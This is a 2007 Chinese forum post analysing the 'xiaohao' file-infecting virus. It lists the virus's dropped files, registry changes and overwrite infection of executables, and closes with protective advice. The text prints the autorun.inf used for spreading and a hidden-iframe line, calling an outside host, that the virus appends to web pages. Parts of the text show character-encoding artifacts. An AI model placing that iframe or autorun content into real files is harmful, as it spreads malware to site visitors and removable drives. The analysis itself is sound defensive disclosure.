|
|
File: C:\Documents and Settings\Administrator\桌面\xiaohao.exe
Size: 12288 bytes
File Version: 1, 0, 0, 1
Modified: 2007年8月14日, 21:03:22
MD5: B50ED06B61CDCF060D0136784999E50C
SHA1: ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD
CRC32: 5CC1E47A
加殼方式:UPX
病毒運(yùn)行后:
1.生成如下文件:
%SystemRoot%\system32\exloroe.exe
每個(gè)分區(qū)下生成一個(gè)xiaohao.exe 和autorun.inf
autorun.inf內(nèi)容
[Autorun]
open=Xiaohao.exe
shellexecute=Xiaohao.exe
shell\Auto\command=Xiaohao.exe
2.添加注冊表項(xiàng)目
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
指向 %SystemRoot%\system32\exloroe.exe達(dá)到開機(jī)啟動(dòng)目的
3.修改注冊表鍵值HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue為0x00000000
破壞顯示隱藏文件
刪除HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2
從而刪除開始菜單中所有的快捷方式
4.感染文件
從系統(tǒng)盤開始 查找所有*.exe的文件 將自身病毒體寫入到正常文件中,被感染后的文件圖標(biāo)為一個(gè)表示有“浩”字的圖標(biāo),病毒采取覆蓋感染的方式,被感染的
exe無法修復(fù)
從系統(tǒng)盤開始 查找所有*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 在其尾部加入代碼
<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>
所有感染的文件的文件名記錄在C:\Jilu.txt里面
并將所有未能感染的文件屬性變?yōu)殡[藏
5.病毒運(yùn)行時(shí),所有窗口標(biāo)題變?yōu)椤耙阎卸荆琗14o-H4o's Virus”
6.系統(tǒng)時(shí)間改為2005年1月17日
病毒作者將其QQ號(hào)碼和博客公布于互聯(lián)網(wǎng)上,以此炫耀自己的技術(shù)。作者的行為和原先的兔子病毒很相像,為了炫耀。
由于病毒感染所有exe文件 所以重啟以后可能會(huì)造成ntoskrnl.exe,ntkrnlpa.exe等核心啟動(dòng)文件被修改從而造成系統(tǒng)啟動(dòng)失敗
如果中了此類病毒 那么幾乎等于判了死刑 必須重裝系統(tǒng) 而且要將其他盤里面所有的*.exe,*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 文件刪掉
希望大家注意如下幾點(diǎn)防范此類病毒
1.安裝還原精靈、冰點(diǎn)還原、雨過天晴等還原軟件(沒裝還軟軟件的參考下兩條)
2.及時(shí)升級(jí)殺毒軟件,防火墻,一定打全系統(tǒng)補(bǔ)丁
3.禁用U盤等移動(dòng)設(shè)備的自動(dòng)播放功能:在“開始”菜單的“運(yùn)行”框中運(yùn)行“gpedit.msc”命令,在“組策略”找到“計(jì)算機(jī)配置”和“用戶配置”下的“管理模板”功能,打開其中的“系統(tǒng)”菜單中的“關(guān)閉自動(dòng)播放”的設(shè)置,在其屬性里面選擇“已啟用”,接著選擇“所有驅(qū)動(dòng)器”,最后確定保存即可。
======摘自卡卡社區(qū) |
|
發(fā)表于 2007-9-13 11:03:47
收藏